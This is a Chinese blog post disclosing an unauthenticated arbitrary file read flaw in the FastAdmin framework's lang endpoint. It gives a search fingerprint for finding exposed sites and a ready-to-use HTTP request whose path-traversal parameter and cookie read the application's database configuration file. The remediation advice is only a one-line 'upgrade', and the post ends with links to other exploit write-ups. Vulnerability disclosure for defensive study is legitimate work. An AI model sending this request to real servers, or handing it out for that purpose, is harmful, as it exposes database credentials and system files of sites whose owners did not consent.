当前位置:首页 > 文章 > 0day

Fastadmin框架任意文件读取漏洞 附POC

admin2周前 (02-12)0day12
摘要:免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。…

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。


01

漏洞名称


Fastadmin框架任意文件读取漏洞


02


影响版本



03


漏洞简介

FastAdmin后台框架开源且可以免费商用,一键生成 CRUD,FastAdmin是一款基于ThinkPHP  Bootstrap 的极速后台开发框架,基于Auth验证的权限管理系统,一键生成 CRUD,自动生成控制器、模型、视图JS、语言包、菜单、回收站等。FastAdmin框架的lang接口存在任意文件读取漏洞,该漏洞允许未授权攻击者通过构造特定请求读取系统敏感文件,如数据库配置文件、系统配置文件等。


04

资产测绘
body="/assets/js/require.js"


05


漏洞复现

POC













GET /index/ajax/lang?lang=../../application/database HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: think_var=..%2F..%2Fapplication%2Fdatabase; PHPSESSID=m0lgoj6m4hovmtisu1868cc8h5Upgrade-Insecure-Requests: 1Priority: u=0, iPragma: no-cacheCache-Control: no-cache


06


修复建议


升级到安全版本


07


往期回顾




扫描二维码推送至手机访问。

版权声明:本文由日常随记发布,如需转载请注明出处。

本文链接:https://www.7x0.cn/post/27.html

“Fastadmin框架任意文件读取漏洞 附POC” 的相关文章

紧急预警:iPhone 曝高危漏洞,黑客已实际攻击!

紧急预警:iPhone 曝高危漏洞,黑客已实际攻击!

近日,苹果官网紧急发布安全公告,正式确认两款高危 WebKit 漏洞(编号 CVE-2025-43529 与 CVE-2025-14174)存在严重安全隐患——目前这两个漏洞已被黑客主动利用,且已有用户遭遇攻击。…

winrar CVE-2025-8088复现学习

winrar CVE-2025-8088复现学习

CVE-2025-8088 (CVSS 8.4)…

泛微E-Mobile 远程命令执行漏洞(RCE)附POC

泛微E-Mobile 远程命令执行漏洞(RCE)附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。…